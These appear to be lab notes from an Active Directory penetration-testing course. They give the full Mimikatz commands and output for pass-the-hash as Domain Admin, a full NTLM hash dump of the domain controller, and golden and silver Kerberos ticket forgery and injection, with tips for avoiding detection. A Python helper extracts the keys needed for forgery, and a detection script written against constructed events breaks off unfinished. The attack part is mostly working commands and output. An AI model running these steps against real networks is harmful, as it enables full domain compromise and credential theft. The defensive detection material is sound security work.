# Learning Objective - 8 and 9

## Golden ticket

We open a session as the Domain Admin from any machine with Mimikatz, using Over-Pass-the-Hash (`sekurlsa::pth`) with the NTLM hash of the domain `Administrator` account. This spawns a new `cmd.exe` whose logon session carries the injected credentials. Note in the output that only the RC4 keys are populated (`aes256_hmac -> null`, `aes128_hmac -> null`), so the Kerberos exchanges from this session are done with RC4-HMAC keys, which stands out on a domain that otherwise uses AES; `sekurlsa::pth` also accepts `/aes256:` and `/aes128:` when those keys are available.

```
PS C:\AD\Tools> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:af0686cc0ca8f04df42210c9ac980760
user    : Administrator
domain  : dollarcorp.moneycorp.local
program : cmd.exe
impers. : no
NTLM    : af0686cc0ca8f04df42210c9ac980760
  |  PID  5128
  |  TID  4660
  |  LSA Process is now R/W
  |  LUID 0 ; 41699318 (00000000:027c47f6)
  \_ msv1_0   - data copy @ 00000216750E60F0 : OK !
  \_ kerberos - data copy @ 00000216753FB7C8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000021675AEF428 (32) -> null

mimikatz #
```

Then, in the spawned console, we dot-source Invoke-Mimikatz and dump the account hashes from the DC with `lsadump::lsa /patch`. The `-Computername dcorp-dc` parameter runs the command on the DC over PowerShell remoting, which works because the session now carries Domain Admin credentials (`lsadump::dcsync /user:dcorp\krbtgt` would fetch the same secret through replication without executing code on the DC). Two values from this output are needed later: the domain SID on the `Domain :` line, and the NTLM hash of `krbtgt` (RID 502), which is the key that encrypts and signs every TGT in the domain. The NTLM hash of the DC machine account `DCORP-DC$` (RID 1000) is used for the silver ticket.

```
PS C:\AD\Tools> . .\Invoke-Mimikatz.ps1
PS C:\AD\Tools> Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /patch
Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 4e9815869d2090ccfca61c1fe0d23986

RID  : 00000459 (1113)
User : sqladmin
LM   :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID  : 0000045a (1114)
User : websvc
LM   :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID  : 0000045b (1115)
User : srvadmin
LM   :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID  : 0000045d (1117)
User : appadmin
LM   :
NTLM : d549831a955fee51a43c83efb3928fa7

RID  : 0000045e (1118)
User : svcadmin
LM   :
NTLM : b38ff50264b74508085d82c69794a4d8

RID  : 0000045f (1119)
User : testda
LM   :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID  : 00000460 (1120)
User : mgmtadmin
LM   :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID  : 00000461 (1121)
User : ciadmin
LM   :
NTLM : e08253add90dccf1a208523d02998c3d

RID  : 00000462 (1122)
User : sql1admin
LM   :
NTLM : e999ae4bd06932620a1e78d2112138c6

RID  : 00001055 (4181)
User : studentadmin
LM   :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID  : 00003521 (13601)
User : student721
LM   :
NTLM : c72c376699f31f096b2d5ab64cbdcd94

RID  : 00003522 (13602)
User : student722
LM   :
NTLM : d24ea4c7d485b9db9033c58cf221c900

RID  : 00003523 (13603)
User : student723
LM   :
NTLM : e602f8c5d4a53971a58774eb4db1bdf0

RID  : 00003524 (13604)
User : student724
LM   :
NTLM : 910d4b954db17832138473b090abb337

RID  : 00003525 (13605)
User : student725
LM   :
NTLM : ddaeb719bb3ebaf44f273cf302965f5a

RID  : 00003526 (13606)
User : student726
LM   :
NTLM : 12a836992d9a17bc71aafe08c58a2657

RID  : 00003527 (13607)
User : student727
LM   :
NTLM : d99bd8f6b5a4522f5ca082969f1479c4

RID  : 00003528 (13608)
User : student728
LM   :
NTLM : 9d50c933c86d072edb0815f82e6a5baf

RID  : 00003529 (13609)
User : student729
LM   :
NTLM : e1a081574f45f39d561e9dda3a918a14

RID  : 0000352a (13610)
User : student730
LM   :
NTLM : 9af9ad18e24b91eb4a0116ec8df5a27f

RID  : 0000352b (13611)
User : student731
LM   :
NTLM : 1f1c0cf05907d2bd7e863a7fe55c45b0

RID  : 0000352c (13612)
User : student732
LM   :
NTLM : c2ddcf1a32f71dce214be2cca9c04993

RID  : 0000352d (13613)
User : student733
LM   :
NTLM : e559ae80aaf6bcdc856b5df589f9d695

RID  : 0000352e (13614)
User : student734
LM   :
NTLM : b166b8e2d5dc7127002837197b3d24f4

RID  : 0000352f (13615)
User : student735
LM   :
NTLM : 2c289e4aee543d3ce0b4d65eb5518ad2

RID  : 00003530 (13616)
User : student736
LM   :
NTLM : 99af9ba03d340bdb9ea572cbf0b58406

RID  : 00003531 (13617)
User : student737
LM   :
NTLM : f3f3922ead678ca56a8319ef7adb6bff

RID  : 00003532 (13618)
User : student738
LM   :
NTLM : 9b8e48d74a130fc0d1865405cf2aaba6

RID  : 00003533 (13619)
User : student739
LM   :
NTLM : a39339b2e182046b60232f0478d6a0a4

RID  : 00003534 (13620)
User : student740
LM   :
NTLM : 483e63bc5ecb5d9026f689946eaaf87c

RID  : 00003535 (13621)
User : Control721user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003536 (13622)
User : Control722user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003537 (13623)
User : Control723user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003538 (13624)
User : Control724user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003539 (13625)
User : Control725user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353a (13626)
User : Control726user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353b (13627)
User : Control727user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353c (13628)
User : Control728user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353d (13629)
User : Control729user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353e (13630)
User : Control730user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 0000353f (13631)
User : Control731user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003540 (13632)
User : Control732user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003541 (13633)
User : Control733user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003542 (13634)
User : Control734user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003543 (13635)
User : Control735user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003544 (13636)
User : Control736user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003545 (13637)
User : Control737user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003546 (13638)
User : Control738user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003547 (13639)
User : Control739user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003548 (13640)
User : Control740user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003549 (13641)
User : Support721user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354a (13642)
User : Support722user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354b (13643)
User : Support723user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354c (13644)
User : Support724user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354d (13645)
User : Support725user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354e (13646)
User : Support726user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354f (13647)
User : Support727user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003550 (13648)
User : Support728user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003551 (13649)
User : Support729user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003552 (13650)
User : Support730user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003553 (13651)
User : Support731user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003554 (13652)
User : Support732user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003555 (13653)
User : Support733user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003556 (13654)
User : Support734user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003557 (13655)
User : Support735user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003558 (13656)
User : Support736user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 00003559 (13657)
User : Support737user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000355a (13658)
User : Support738user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000355b (13659)
User : Support739user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000355c (13660)
User : Support740user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000355d (13661)
User : VPN721user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000355e (13662)
User : VPN722user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000355f (13663)
User : VPN723user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003560 (13664)
User : VPN724user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003561 (13665)
User : VPN725user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003562 (13666)
User : VPN726user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003563 (13667)
User : VPN727user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003564 (13668)
User : VPN728user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003565 (13669)
User : VPN729user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003566 (13670)
User : VPN730user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003567 (13671)
User : VPN731user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003568 (13672)
User : VPN732user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003569 (13673)
User : VPN733user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356a (13674)
User : VPN734user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356b (13675)
User : VPN735user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356c (13676)
User : VPN736user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356d (13677)
User : VPN737user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356e (13678)
User : VPN738user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 0000356f (13679)
User : VPN739user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 00003570 (13680)
User : VPN740user
LM   :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID  : 000003e8 (1000)
User : DCORP-DC$
LM   :
NTLM : ef7a661f7edb7f5a1be191640342d6b7

RID  : 00000451 (1105)
User : DCORP-ADMINSRV$
LM   :
NTLM : b5f451985fd34d58d5120816d31b5565

RID  : 00000452 (1106)
User : DCORP-APPSRV$
LM   :
NTLM : b4cb7bf8b93c78b8051c7906bb054dc5

RID  : 00000453 (1107)
User : DCORP-CI$
LM   :
NTLM : f76f48c176dc09cfd5765843c32809f3

RID  : 00000454 (1108)
User : DCORP-MGMT$
LM   :
NTLM : 0878da540f45b31b974f73312c18e754

RID  : 00000455 (1109)
User : DCORP-MSSQL$
LM   :
NTLM : b205f1ca05bedace801893d6aa5aca27

RID  : 00000456 (1110)
User : DCORP-SQL1$
LM   :
NTLM : 3686dfb420dc0f9635e70c6ca5875b49

RID  : 0000106a (4202)
User : DCORP-STDADMIN$
LM   :
NTLM : e444bbf444732fc38065ea9e9255ab03

RID  : 00003571 (13681)
User : DCORP-STD721$
LM   :
NTLM : b9fed91f5f32818fae2271b05f189926

RID  : 00003572 (13682)
User : DCORP-STD722$
LM   :
NTLM : 2b04543bc07afe3966ff85e06f0a9412

RID  : 00003573 (13683)
User : DCORP-STD724$
LM   :
NTLM : e80b06a0063459999d702dc654312ea5

RID  : 00003574 (13684)
User : DCORP-STD723$
LM   :
NTLM : efd9824a276d26fcc5fc2ca14273225c

RID  : 00003575 (13685)
User : DCORP-STD726$
LM   :
NTLM : 05df9f9bc89dd594c5884e20ce1c683b

RID  : 00003576 (13686)
User : DCORP-STD729$
LM   :
NTLM : 03a26f64fd32b458ca55614c41bc5d80

RID  : 00003577 (13687)
User : DCORP-STD725$
LM   :
NTLM : 0783061c7d97c91b32b6f0c9b2a66c05

RID  : 00003578 (13688)
User : DCORP-STD728$
LM   :
NTLM : 43949d8590e999a5ca4b0eb369c6c620

RID  : 00003579 (13689)
User : DCORP-STD727$
LM   :
NTLM : a19a6642a51ee86db03d722bb2ae7930

RID  : 0000357a (13690)
User : DCORP-STD731$
LM   :
NTLM : e09c18c5b34fb9db4b4bd4e2bdc24c06

RID  : 0000357b (13691)
User : DCORP-STD732$
LM   :
NTLM : fcbf3df06ea9f5a0c0e9d9117bdb9d16

RID  : 0000357c (13692)
User : DCORP-STD730$
LM   :
NTLM : 3befa14afd532cc6faba9f0f9abb3128

RID  : 0000357d (13693)
User : DCORP-STD733$
LM   :
NTLM : e6fb50826836c584764b2e8275bedd9b

RID  : 0000357e (13694)
User : DCORP-STD735$
LM   :
NTLM : 8e5d039b8050c4e6d808ba7b904a107f

RID  : 0000357f (13695)
User : DCORP-STD734$
LM   :
NTLM : a68fa0eb1fa1d3da3a1e43f0e89049a3

RID  : 00003580 (13696)
User : DCORP-STD736$
LM   :
NTLM : 0267e3942c7d30950dba326f224f1882

RID  : 00003581 (13697)
User : DCORP-STD737$
LM   :
NTLM : 845002eccf7afd8343e818d2794d6556

RID  : 00003582 (13698)
User : DCORP-STD739$
LM   :
NTLM : 3070e58dbca650744068b1e120fefddc

RID  : 00003583 (13699)
User : DCORP-STD740$
LM   :
NTLM : b7bb22710be9d4a91bc42e7796ecd458

RID  : 00003584 (13700)
User : DCORP-STD738$
LM   :
NTLM : 6dc73ad2690d87a76bbd4a0ded74808d

RID  : 0000044f (1103)
User : mcorp$
LM   :
NTLM : f5b5c9f1ca76187393db1d3bb8ded94e

RID  : 00000450 (1104)
User : US$
LM   :
NTLM : f85385d81cc4936d37ff8f27813f43c6

RID  : 00000458 (1112)
User : ecorp$
LM   :
NTLM : 4501e4c7f30e1cb3c9886f06a3ed1c6a
```
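As an added example (not part of the original notes), a small Python parser for the `lsadump::lsa /patch` output above. Besides pulling out the domain SID and the two keys the next steps need, it groups accounts by NT hash: identical hashes mean identical passwords, and in the dump above every Control*user shares one hash, every Support*user another and every VPN*user a third, so compromising any one of them gives the password of the whole group. The sample input is an excerpt of this page's own dump; the function names are ours.

```python
import re
from collections import defaultdict

# Excerpt of the lsadump::lsa /patch output shown above (taken from the page's own dump).
LSADUMP_EXCERPT = """\
Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 4e9815869d2090ccfca61c1fe0d23986

RID  : 00003535 (13621)
User : Control721user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003536 (13622)
User : Control722user
LM   :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID  : 00003549 (13641)
User : Support721user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 0000354a (13642)
User : Support722user
LM   :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID  : 000003e8 (1000)
User : DCORP-DC$
LM   :
NTLM : ef7a661f7edb7f5a1be191640342d6b7
"""

# One mimikatz entry: RID line, User line, LM line (usually empty), NTLM line (may be empty, e.g. Guest).
ENTRY_RE = re.compile(
    r"RID\s+:\s+[0-9a-f]+\s+\((?P<rid>\d+)\)[ \t]*\n"
    r"User\s+:\s+(?P<user>\S+)[ \t]*\n"
    r"LM\s+:[ \t]*(?P<lm>[0-9a-f]{32})?[ \t]*\n"
    r"NTLM\s+:[ \t]*(?P<ntlm>[0-9a-f]{32})?",
    re.IGNORECASE,
)
SID_RE = re.compile(r"Domain\s+:\s+\S+\s+/\s+(S-1-5-21-\d+-\d+-\d+)")


def parse_lsadump(text):
    """Return (domain_sid, [{rid, user, lm, ntlm}, ...]) from lsadump::lsa output."""
    m = SID_RE.search(text)
    sid = m.group(1) if m else None
    entries = []
    for e in ENTRY_RE.finditer(text):
        entries.append({
            "rid": int(e.group("rid")),
            "user": e.group("user"),
            "lm": (e.group("lm") or "").lower() or None,
            "ntlm": (e.group("ntlm") or "").lower() or None,
        })
    return sid, entries


def shared_hashes(entries):
    """Map NT hash -> sorted users sharing it (only hashes used by two or more accounts)."""
    by_hash = defaultdict(list)
    for e in entries:
        if e["ntlm"]:
            by_hash[e["ntlm"]].append(e["user"])
    return {h: sorted(users) for h, users in by_hash.items() if len(users) > 1}


def ticket_keys(entries, dc_account="DCORP-DC$"):
    """Pick the /rc4: keys used above: krbtgt for the golden ticket, the DC machine account for the silver one."""
    keys = {e["user"].lower(): e["ntlm"] for e in entries}
    return {"golden_rc4": keys.get("krbtgt"), "silver_rc4": keys.get(dc_account.lower())}


if __name__ == "__main__":
    sid, entries = parse_lsadump(LSADUMP_EXCERPT)
    print("domain SID:", sid)
    for h, users in shared_hashes(entries).items():
        print(f"{h} shared by {len(users)} accounts: {', '.join(users)}")
    print(ticket_keys(entries))
```

Run it on the full dump and the three shared hashes (Control*, Support*, VPN* accounts) come out as one line each; the Guest entry shows why the NTLM group is optional in the regex.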

Creating the golden ticket. `/sid:` is the domain SID from the `Domain :` line of the dump and `/rc4:` is the krbtgt NTLM hash; `/User:Administrator` with the default `/id:500` and groups `513 512 520 518 519` (Domain Users, Domain Admins, Group Policy Creator Owners, Schema Admins, Enterprise Admins) is accepted by the KDC because the PAC is signed with the krbtgt key. `/startoffset:0 /endin:600 /renewmax:10080` gives a 10-hour ticket renewable for 7 days, the defaults of the domain Kerberos policy, so its lifetime does not stand out the way Mimikatz's own 10-year default does. `/ticket` writes the result to `ticket.kirbi` instead of injecting it into the current session (`/ptt`):

{% code overflow="wrap" %}

```
PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4e9815869d2090ccfca61c1fe0d23986 /startoffset:0 /endin:600 /renewmax:10080 /ticket" "exit"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4e9815869d2090ccfca61c1fe0d23986 /startoffset:0 /endin:600 /renewmax:10080 /ticket
User      : Administrator
Domain    : dollarcorp.moneycorp.local (DOLLARCORP)
SID       : S-1-5-21-719815819-3726368948-3917688648
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4e9815869d2090ccfca61c1fe0d23986 - rc4_hmac_nt
Lifetime  : 2/24/2024 1:13:24 AM ; 2/24/2024 11:13:24 AM ; 3/2/2024 1:13:24 AM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(powershell) # exit
Bye!

PS C:\AD\Tools\tickets> ls


    Directory: C:\AD\Tools\tickets


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/24/2024   1:13 AM           1489 ticket.kirbi

```

{% endcode %}

## Silver Ticket

We run the same `kerberos::golden` module to forge the silver ticket. The differences are `/target:dcorp-dc.dollarcorp.moneycorp.local` and `/service:HOST`, which make it a service ticket (TGS) for the HOST SPN of the DC rather than a TGT, and the `/rc4:` key, which is now the NTLM hash of the DC machine account `DCORP-DC$` (RID 1000 in the dump above), because a service ticket is encrypted with the key of the account that runs the service. The ticket is presented straight to the service, so the KDC never sees a request and logs no 4768/4769 for it. The `ls` output shows that the golden ticket from the previous step was renamed to `golden-ticket.kirbi` before this run (same size and timestamp), so the new `ticket.kirbi` is the silver one:

{% code overflow="wrap" %}

```
PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:ef7a661f7edb7f5a1be191640342d6b7 /startoffset:0 /endin:600 /renewmax:10080 /ticket" "exit"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:ef7a661f7edb7f5a1be191640342d6b7 /startoffset:0 /endin:600 /renewmax:10080 /ticket
User      : Administrator
Domain    : dollarcorp.moneycorp.local (DOLLARCORP)
SID       : S-1-5-21-719815819-3726368948-3917688648
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: ef7a661f7edb7f5a1be191640342d6b7 - rc4_hmac_nt
Service   : HOST
Target    : dcorp-dc.dollarcorp.moneycorp.local
Lifetime  : 2/25/2024 2:22:44 PM ; 2/26/2024 12:22:44 AM ; 3/3/2024 2:22:44 PM
-> Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(powershell) # exit
Bye!

PS C:\AD\Tools\tickets> ls


    Directory: C:\AD\Tools\tickets


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         2/24/2024   1:13 AM           1489 golden-ticket.kirbi
-a----         2/25/2024   2:22 PM           1503 ticket.kirbi

```

{% endcode %}

## Importing the ticket with Mimikatz

`klist` shows an empty ticket cache before `kerberos::ptt` and a single ticket afterwards (the silver ticket was renamed from `ticket.kirbi` to `silver-ticket.kirbi` first). Two details in the imported ticket give it away as forged to anyone inspecting the cache: `Kdc Called:` is empty because no KDC issued it, and both the ticket and the session key use `RC4-HMAC(NT)` rather than AES.

{% code overflow="wrap" %}

```
PS C:\AD\Tools\tickets> klist

Current LogonId is 0:0x17ce62

Cached Tickets: (0)
PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::ptt silver-ticket.kirbi" "exit"'

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # kerberos::ptt silver-ticket.kirbi

* File: 'silver-ticket.kirbi': OK

mimikatz(powershell) # exit
Bye!

PS C:\AD\Tools\tickets> klist

Current LogonId is 0:0x17ce62

Cached Tickets: (1)

#0>     Client: Administrator @ dollarcorp.moneycorp.local
        Server: HOST/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
        Start Time: 2/25/2024 14:22:44 (local)
        End Time:   2/26/2024 0:22:44 (local)
        Renew Time: 3/3/2024 14:22:44 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0
        Kdc Called:
PS C:\AD\Tools\tickets>
```

{% endcode %}
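On the defensive side, as an added example that is not part of the original notes: detection logic for the two forgeries above (golden ticket and silver ticket), run over constructed Windows Security events. The field names follow the 4768/4769/4624 event schemas, but the records, the second client address 172.16.100.50 and the timestamps are made up for the example. A golden ticket is a TGT the KDC never issued, so the DC sees 4769 service-ticket requests for a user and client with no 4768 TGT request in the preceding TGT lifetime; a silver ticket never touches the KDC, so the target host logs a 4624 Kerberos network logon for which the DC has no 4769 for that user, client and service account. RC4-HMAC (0x17) ticket encryption is kept as a weaker third signal, since both tickets above were forged with `/rc4:` keys.

```python
from datetime import datetime, timedelta

T0 = datetime(2024, 2, 25, 8, 0, 0)


def at_minutes(m):
    return (T0 + timedelta(minutes=m)).isoformat()


# Constructed Security events (not real logs). The DC dcorp-dc logs 4768/4769 as the KDC;
# 4624 is logged by the host that accepted the logon (here also dcorp-dc, the silver ticket's target).
EVENTS = [
    # Legitimate activity from 172.16.100.50: AES TGT, AES service ticket for the DC, then the logon.
    {"id": 4768, "host": "dcorp-dc", "time": at_minutes(0), "TargetUserName": "Administrator",
     "IpAddress": "172.16.100.50", "TicketEncryptionType": "0x12"},
    {"id": 4769, "host": "dcorp-dc", "time": at_minutes(1), "TargetUserName": "Administrator@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "DCORP-DC$", "IpAddress": "172.16.100.50", "TicketEncryptionType": "0x12"},
    {"id": 4624, "host": "dcorp-dc", "time": at_minutes(2), "TargetUserName": "Administrator", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "172.16.100.50"},
    # Silver ticket from 172.16.100.23: Kerberos logon on the DC that the KDC never issued a ticket for.
    {"id": 4624, "host": "dcorp-dc", "time": at_minutes(120), "TargetUserName": "Administrator", "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "172.16.100.23"},
    # Golden ticket from 172.16.100.23: TGS request (RC4) with no TGT request (4768) from that client.
    {"id": 4769, "host": "dcorp-dc", "time": at_minutes(180), "TargetUserName": "Administrator@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "DCORP-DC$", "IpAddress": "172.16.100.23", "TicketEncryptionType": "0x17"},
]

MAX_TGT_LIFETIME = timedelta(hours=10)  # default domain policy; the same value as /endin:600 above


def _user(e):
    """4769 carries user@REALM, 4768/4624 carry the bare name; compare on the bare, lower-cased name."""
    return e["TargetUserName"].split("@")[0].lower()


def _t(e):
    return datetime.fromisoformat(e["time"])


def _preceded_by(event, candidates, window):
    """True if any candidate happened within `window` before `event` (same instant included)."""
    t = _t(event)
    return any(t - window <= _t(c) <= t for c in candidates)


def tgs_without_tgt(events, window=MAX_TGT_LIFETIME):
    """Golden-ticket signal: a 4769 for a user/client with no 4768 for that user/client within one TGT lifetime."""
    tgts = [e for e in events if e["id"] == 4768]
    hits = []
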